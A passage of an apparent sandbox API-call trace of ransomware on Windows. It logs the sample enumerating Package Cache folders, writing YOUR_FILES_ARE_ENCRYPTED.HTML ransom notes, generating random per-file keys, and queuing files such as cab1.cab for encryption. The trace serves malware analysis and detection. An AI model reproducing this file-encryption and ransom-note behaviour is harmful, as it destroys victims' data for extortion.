ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0108.288] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.289] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0108.289] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0108.289] lstrlenW (lpString=".msi") returned 4 [0108.289] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0108.289] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0108.289] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0108.289] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0108.289] GetProcessHeap () returned 0x600000 [0108.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.290] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0108.292] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.293] CloseHandle (hObject=0x314) returned 1 [0108.294] GetProcessHeap () returned 0x600000 [0108.294] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.294] GetProcessHeap () returned 0x600000 [0108.294] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0108.296] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fe967, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fd0, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0108.296] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0108.296] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0108.296] GetProcessHeap () returned 0x600000 [0108.296] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.296] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.297] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.298] CloseHandle (hObject=0x308) returned 1 [0108.299] GetProcessHeap () returned 0x600000 [0108.299] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.299] GetProcessHeap () returned 0x600000 [0108.299] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.300] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fd5cd, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fe967, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fe967, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0108.300] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.300] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0108.300] GetProcessHeap () returned 0x600000 [0108.300] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.301] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.301] WriteFile (in: hFile=0x30c, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.302] CloseHandle (hObject=0x30c) returned 1 [0108.303] GetProcessHeap () returned 0x600000 [0108.303] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.303] GetProcessHeap () returned 0x600000 [0108.303] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.304] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", cAlternateFileName="{2BC3B~1.285")) returned 1 [0108.304] StrStrIW (lpFirst="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.304] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned 83 [0108.304] GetProcessHeap () returned 0x600000 [0108.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6994a0 [0108.305] lstrcpyW (in: lpString1=0x6994a0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" [0108.305] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*" [0108.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626738 [0108.306] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.306] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0108.306] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.306] wnsprintfW (in: pszDest=0x6994a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned 92 [0108.306] GetProcessHeap () returned 0x600000 [0108.306] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.307] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" [0108.307] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*" [0108.307] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.308] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0108.308] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0108.308] StrStrIW (lpFirst="vcRuntimeMinimum_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.308] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned 113 [0108.308] GetProcessHeap () returned 0x600000 [0108.308] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0108.309] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" [0108.309] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*" [0108.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626978 [0108.309] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0108.309] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb21afe00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xb21afe00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xb21afe00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x14de75, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0108.310] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.310] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0108.310] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.310] lstrlenW (lpString=".cab") returned 4 [0108.310] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.310] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0108.310] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0108.310] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=1367669) returned 1 [0108.310] GetProcessHeap () returned 0x600000 [0108.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0108.314] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="E0") returned 2 [0108.314] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="1F") returned 2 [0108.314] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="DA") returned 2 [0108.314] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="55") returned 2 [0108.314] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="BB") returned 2 [0108.383] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="DC") returned 2 [0108.383] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="ED") returned 2 [0108.424] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="16") returned 2 [0108.424] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="BD") returned 2 [0108.424] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="E9") returned 2 [0108.424] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="F8") returned 2 [0108.424] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="CF") returned 2 [0108.424] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="62") returned 2 [0108.424] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="CB") returned 2 [0108.424] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="B9") returned 2 [0108.424] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="15") returned 2 [0108.424] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="E0") returned 2 [0108.424] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="E7") returned 2 [0108.424] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="9F") returned 2 [0108.425] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="D1") returned 2 [0108.425] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="D7") returned 2 [0108.425] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="F1") returned 2 [0108.425] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="62") returned 2 [0108.425] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="3E") returned 2 [0108.425] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="42") returned 2 [0108.425] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="1F") returned 2 [0108.425] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="AE") returned 2 [0108.425] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="D1") returned 2 [0108.425] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="FF") returned 2 [0108.425] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="B1") returned 2 [0108.425] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="D4") returned 2 [0108.425] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="36") returned 2 [0108.426] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0108.426] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0108.426] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0108.426] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0108.426] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.426] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0108.427] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0108.428] lstrlenW (lpString=".msi") returned 4 [0108.428] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0108.428] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0108.428] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0108.431] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0108.431] GetProcessHeap () returned 0x600000 [0108.431] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.432] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0108.487] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.488] CloseHandle (hObject=0x314) returned 1 [0108.489] GetProcessHeap () returned 0x600000 [0108.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.489] GetProcessHeap () returned 